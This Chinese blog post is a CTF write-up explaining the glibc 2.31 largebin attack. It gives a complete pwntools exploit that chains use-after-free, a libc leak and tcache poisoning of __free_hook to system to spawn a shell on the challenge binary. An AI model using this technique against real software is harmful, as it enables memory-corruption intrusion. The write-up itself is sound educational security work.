PRO(2.31largebin attack)

最新推荐文章于 2024-02-14 13:06:46 发布
最新推荐文章于 2024-02-14 13:06:46 发布
阅读量2.8k 收藏 3
点赞数
文章标签: 链表 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33590156/article/details/121716696
版权

关于largebin

pro版本给了修复chunk flag的函数,而且show和edit都只看flag,free还没清指针,可以各种UAF。

但是,add中只能申请large chunk,这导致UAF不能进行任意地址申请,而且版本是libc2.31。

所以我们能用的就只能是largebin attack了,首先利用原理是,在largebin的管理中,采用先进先出的原则(插队头,取队尾),而且会排序,队头大,到队尾依次变小,

四个指针:

fd是从队头一直指向队尾,队尾的fd指向main_arena;

bk则是相反,队头的bk指向main_arena。

fd_nextsize则是从队尾指向队头(从小指到大),但队头的fd_nextsize指向队尾;

bk_nextsize相反,从队头指向队尾(从大指到小),队尾的bk_nextsize指向main_areana

所以,largebin attack的原理就是利用,2.31里largebin会排序插入但没有unlink检测漏洞

首先放一个chunk1在largebin中,然后修改他的bk_nextsize = target - 0x20(fake chunk的fd_size)

之后再free一个比chunk1小但在同一个链表大小的chunk2,这样他就会插到chunk1的队尾去,此时因为chunk1的bk_nextsize指向别处,所以他会认为那是个chunk,就会让他的fd_nextsize指向插入的chunk2,这样就在target写上了一个大值。

简单说就是

//1.申请chunk1(大),chunk2(小)
//2.free(1)进入largebin
//3.修改chunk1的bk_nextsize = target-0x20
//4.free(2)进入largebin

即可完成攻击,

关于进入largebin,先free会放入unsortedbin中,然后申请一个比他大的chunk,就会触发malloc consolidate,将它放入largebin了(smallbin也一样,比如smallbin stash攻击)

本题

因为限制了大小,所以无法UAF,先用largrbin attack 在tcache_max_bin处写下大值,就会将更大的chunk放入tcache,就可以UAF了

细节:

tcache_max_bin在mp_ +80的地方,可以用p& mp_ 找到,本身值为0x40,也就是0x40个entry,每个增值为0x10,也就是最大0x408,将这个值改大,就能放更大的chunk进去

然后在2.31版本,以前,tcache的UAF,只需要free(1),edit(1,target addr),(entry num=1),再申请两个chunk就能拿到target addr,但现在不行了,必须free(1),free(2),edit(1,target addr),(entry num=2),再申请两个才能拿到,我认为应该是2.31会检测堆上tcache thread的数量,有多少就可以拿几个

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')

#libc
#libc = ELF('/home/hacker/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
#libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
#libc = ELF('/home/hacker/Desktop/libc/amd64/libc-2.23.so')
libc = ELF("/home/hacker/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc-2.31.so")

#p
elf = ELF('./main')
p = process('./main')
#p = remote("192-168-1-150.pvp638.bugku.cn",9999)


def add(idx,name,size,content):
	p.sendafter("Choice:\n",'1')
	p.sendlineafter("Add:",str(idx))
	p.sendlineafter("Save:",name)
	p.sendlineafter("Pwd:",str(int(size)))
	p.sendlineafter(":",content)

def edit(idx,content):
	p.sendlineafter("Choice:\n",'2')
	p.sendlineafter("Edit:",str(idx))
	p.sendline(content)

def show(idx):
	p.sendafter("Choice:\n",'3')
	p.sendlineafter("Check:",str(idx))

def free(idx):
	p.sendafter("Choice:\n",'4')
	p.sendlineafter("Delete:\n",str(idx))

def Recover(idx):
	p.sendafter("Choice:\n",'5')
	p.sendlineafter("Recover:",str(idx))

add(0,'a',0x500,'\x00'*0x10)
p.recvuntil("ID:")
key = u64(p.recv(8)) #int
log.info("key="+hex(key))
add(1,'a',0x600,'\x00'*0x10)
add(2,'a',0x500,'\x00'*0x10)
add(3,'a',0x5f8,'\x00'*0x10)
add(4,'a',0x500,"\x00")
#add(6,'a',0x800,'\x00'*0x10)
free(0)

Recover(0)
show(0)
p.recvuntil("is: ")
libc_base = (u64(p.recv(8))^key)-96-0x10-libc.sym["__malloc_hook"]
log.info("libc_base="+hex(libc_base))
add(0,'a',0x500,'\x00'*0x10)
fd = libc_base+0x1ec050#main_arena+1232
tcache_max_bins = libc_base+0x1eb2d0#mp_+80-libc_base

#put 1 in large
free(1)
add(5,'a',0x700,'\x00'*0x10)

Recover(1)
show(1)
p.recvuntil("is: ")
p.recv(16)
bk_nextsize = (u64(p.recv(8))^key)
log.info("bk_nextsize="+hex(bk_nextsize))
edit(1,p64(fd)*2+p64(bk_nextsize)+p64(tcache_max_bins-0x20))#largebin attack

#put 3 in large
free(3)
add(6,'a',0x800,'\x00'*0x10)

free(0)
free(2)#free two to change tcache become 2
Recover(2)
edit(2,p64((libc_base+libc.sym["__free_hook"])))

add(7,'a',0x500,'\x00'*0x10)
add(8,'a',0x500,p64((libc_base+libc.sym["system"])^key))


edit(4,"/bin/sh\x00")
free(4)
#gdb.attach(p)
p.interactive()
Wust-Mo0n5ea丶
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Large bin attack
abelxu
11-26 1881
0x01 large bin Large bins 中一共包括 63 个 bin,index为64~126,每个 bin 中的 chunk 的大小不一致,而是处于一定区间范围内。(本文讨论的代码和结构都是在glibc2.23 64位的情况) 1.largebin的一些结构 在largebin的处理过程中会用到fd_next和bk_nextsize来加快chunk的处理。 struct malloc_chunk { INTERNAL_SIZE_T prev_size; /* Size of
好好说话之Large Bin Attack
hollk’s blog
01-20 4648
large bin attack这种方法本质上并不难,只是有点绕而已。他和上一篇unsorted bin attack有点类似,都是chunk挂进bin链表的时候通过完成链表结构连接时发生的问题,只不过large chunk还需要考虑fd_nextsize和bk_nextsize这两个结构。接下来就剩Tcache attack和House系列啦!终于要熬出头了???? 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
large bin attack & house of strom
seaaseesa的博客
06-12 1156
large bin attack & house of strom large bin attack是一种堆利用手法,而house of strom则是在large bin attack的基础上借用unsorted bin来达到任意地址分配,首先我们从源码入手来分析large bin attack原理,然后再讲讲house of strom的原理,接着再看几个题目。 为例方便分析,以2.23为例,新版本有tcache的情况类似,只需填满tcache bin绕过tcache即可。 在free的时
Largebin Attack原理详解
qq_41252520的博客
08-07 1482
攻击成效:能够向任意地址写堆地址,常配合其他攻击手法实现getshell。条件:能够修改Largebin−>bkLargebin−>bk。研究环境:Glibc2.31\textcolor{green}{研究环境:Glibc2.31}研究环境:Glibc2.31现在总结一下Largebin attack的一些利用条件和步骤。能够修改Largebin中的块的字段。程序中至少能够分配三种属于Largebin的不同大小的块。分配一块大小。...
[阅读型]glibc-2.31中的tcache stashing unlink与large bin attack
easy_level1的博客
06-01 1587
文章目录前言题目的漏洞与功能tcache stashing unlinklarge bin attack有了上述方法,然后做什么 前言 有幸和校队一起参加21年5月的xctf-final。笔者爆肝连续战斗十小时,在与队友各种讨论下艰难做出了house of pig这一题。事后看出题人的wp,方法不尽相同但也是收获良多,特此记录。 笔者的这题解法是没有large bin attack的(知识盲区),利用tcache stashing unlink写global_max_fast完成house of hust,
centos7升级glibc2.31.zip
11-12
本文将详细讲解如何在CentOS 7上安全地升级到Glibc 2.31。 **1. 备份现有系统** 在进行任何重大系统修改之前,备份至关重要。创建一个系统快照或重要数据的备份,以便在出现问题时能够恢复。 **2. 添加EPEL仓库**...
Photocopier 2.31 安装版 免注册免设置
10-07
《 Photocopier 2.31 安装版:打造便捷的个人办公室复印解决方案》 在信息化社会,高效办公已成为日常需求,而 Photocopier 2.31 正是这样一款旨在简化复印流程的软件,它将扫描仪与打印机无缝结合,让用户在家或...
豆丁当当V2.31.rar
11-07
豆丁当当是一款针对豆丁网文档下载的工具,版本为V2.31。从提供的文件列表来看,我们可以分析出这款软件的核心组件和可能的功能。 1. **libeay32.dll 和 ssleay32.dll**: 这两个文件是OpenSSL库的一部分,用于...
glibc-2.31 和 sgerrand.rsa.pub
11-04
描述中的文件名 "glibc-2.31-r0.apk"、"glibc-bin-2.31-r0.apk" 和 "glibc-i18n-2.31-r0.apk" 提示我们这是 Glibc 2.31 版本的不同组件。`glibc-2.31-r0.apk` 可能是核心库文件,包含库函数的二进制实现;`glibc-bin...
OpenCV2.31
10-19
之所以选择2.31版本,是因为从2.31版本开始,下载的opencv解压文件中已经有了完整的编译过的各项文件,在build文件夹里可以找到,从此告别cmake那个繁琐的重编译,有简单的能用就没有必要被别人误导着在电脑前瞪着...
Largebin_Attack知识理解(附赠堆分配释放过程回忆!)
a2590035252的博客
09-30 1131
朋友们好啊,我史混源行易太极门掌门人peiWhao。刚才有个朋友问我P老师发生甚么事了,我说怎么回事,给我发了几个网址,我一看!奥!原来是昨天,有一个年轻知识点,一个事largebin、、、、、、
好好说话之Fastbin Attack(3):Alloc to Stack
hollk’s blog
12-17 1362
真的是好久好久都没更新了。。。。最近换工作再加上考CISP-PTE认证耽误了很长一段时间,这段时间打算把CISP-PTE的一些考点总结出来,如果你是做渗透工作或者ctf的web手,这个认证其实并不难。再来说说这篇文章吧,Alloc to Stack这种利用技巧其实和前面两篇区别不大,只不过就是伪造的chunk放在了栈上。这篇文章不会很长,因为wiki上没有适配的例子,自己也没找到。如果有做过这种技巧的例子的师傅,欢迎评论区留言~wiki上2015 9447 CTF : Search Engine这道题我会在
好好说话之Fastbin Attack(2):House Of Spirit
hollk’s blog
10-30 3152
Fastbin Attack的第二种攻击方式House Of Spirit,相对来说是double free的升华。在检查绕过的时候会相对麻烦一点,其他的地方还是挺简单的,如果上一篇文上你领悟的很好的话,这篇文章也不会很难理解。 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
西湖论剑 预选赛 pwn3 看 Largebin
qq_41071646的博客
07-21 271
参考链接 https://xz.aliyun.com/t/4791#toc-13 不得不说 这个博客写的很详细了。。。 建议去看 上面的链接 上面的链接写的 很详细 这个题 让我认识到了 Large bin 这个玩意真的很,,,,难 感觉比上面那两个难很多 一般来说 题目很少涉及 Large bin 涉及的题目一般都会禁止 fastbin if ( !mall...
house of pig详解
Test网络安全
09-05 4947
在复现这题之前需要了解一些前置知识:libc2.31下的largebin_attack,tcache_stashing_unlink plus以及高版本glibc下的IO_FILE攻击 首先看到libc2.31下的largebin_attack 0x1.libc2.31下的largebin_attack 跟随how2heap项目中的largebin_attack以及源码调试来学习。 从libc2.30开始,largebin的插入代码中新增了两个检查 先看到第一个点 将uns.
从零开始学howtoheap:理解fastbins的​large_bin攻击
最新发布
weixin_44626085的博客
02-14 800
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。
glibc-2.29 large bin attack 原理
qq_23066945的博客
11-14 1057
glibc-2.29 large bin attack 原理 原创: 星盟安全团队 星盟安全 该方法并非笔者发现,而是阅读 balsn 的 writeup 时分析而得到的,这里介绍一下这种攻击方法。 unsorted bin attack 在介绍新的攻击技术之前,先来缅怀一下 unsorted bin attack , 由于 glibc-2.29 新上的保护措施,使得 unsorted bin ...
glibc 2.31 pwn——house of pig原题分析与示例程序
CoLin的pwn小屋
01-09 982
house of pig题目解析及演示程序
glibc 2.31安装
09-28
例如:$ ../configure --prefix=/usr --disable-profile --enable-add-ons --with-headers=/usr/include --with-binutils=/usr/bin --disable-sanity-checks --disable-werror 7. 如果在编译过程中出现报错可能是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值